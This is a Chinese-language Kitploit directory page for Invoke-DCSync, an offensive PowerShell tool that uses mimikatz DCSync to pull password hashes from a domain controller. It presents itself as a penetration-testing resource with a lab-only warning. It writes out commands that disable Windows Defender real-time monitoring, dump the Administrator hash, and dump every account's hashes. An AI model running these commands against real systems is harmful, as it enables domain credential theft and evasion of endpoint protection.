Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Invoke-DCSync — Invoke-DCSync | Kitploit
工具/GitHubGitHub/al1ex/invoke-dcsync
密码攻击漏洞利用横向移动后渗透利用渗透测试红队
GitHubal1ex/invoke-dcsync

Invoke-DCSync

Invoke-DCSync

查看仓库
1325年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Invoke-DCSync

Invoke-DCSync 参考:https://adsecurity.org/?p=1729 参考:https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/ 目标:使用 mimikatz DCSync 功能从域控制器检索所有用户账户的密码哈希

警告:仅在实验环境中执行此操作。

mimikatz 实现了一个名为 DCSync 的工具,这使 mimikatz 能够模拟域控制器,并尝试从另一个域控制器检索所有密码哈希。

你可能需要禁用 Windows Defender

以管理员身份打开 PowerShell 并输入

$ Set-MpPreference -DisableRealtimeMonitoring $true

启动 mimikatz

$ lsadump::dcsync /domain:test.local /user:Administrator

现在你已获得该用户的密码哈希

这要求你具有管理员访问权限,特别是 Get-Replication-Changes-All 通用名称属性

可以使用 Invoke-DCSync 模块提取所有哈希。

下载自:https://gist.github.com/monoxgas/9d238accd969550136db

root@kitploit:~
$ Import-Module ./Invoke-DCSync.ps1
$ Invoke-DCSync -PWDumpFormat
下载工具